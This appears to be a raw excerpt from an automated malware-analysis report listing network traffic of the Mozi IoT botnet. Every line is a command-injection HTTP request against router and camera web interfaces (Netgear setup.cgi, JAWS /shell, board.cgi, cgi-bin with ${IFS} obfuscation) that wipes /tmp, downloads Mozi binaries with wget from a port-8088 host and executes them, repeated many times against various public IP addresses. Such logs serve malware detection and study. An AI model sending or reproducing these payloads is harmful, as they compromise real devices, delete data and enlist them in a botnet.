                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 95.213.81.21:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 200.13.149.223:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 86.252.168.14:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 133.133.78.165:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 164.167.9.70:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 2.243.56.199:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 182.151.249.38:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 148.76.110.167:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 87.41.98.96:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 53.189.162.142:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 22.32.12.201:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 71.241.194.217:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 20.191.233.24:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 11.3.1.179:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 94.134.209.196:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 16.34.243.125:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 121.122.226.155:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 16.156.233.47:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 79.141.55.107:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 123.87.2.237:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 200.60.162.40:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 175.127.32.99:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 50.82.114.48:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
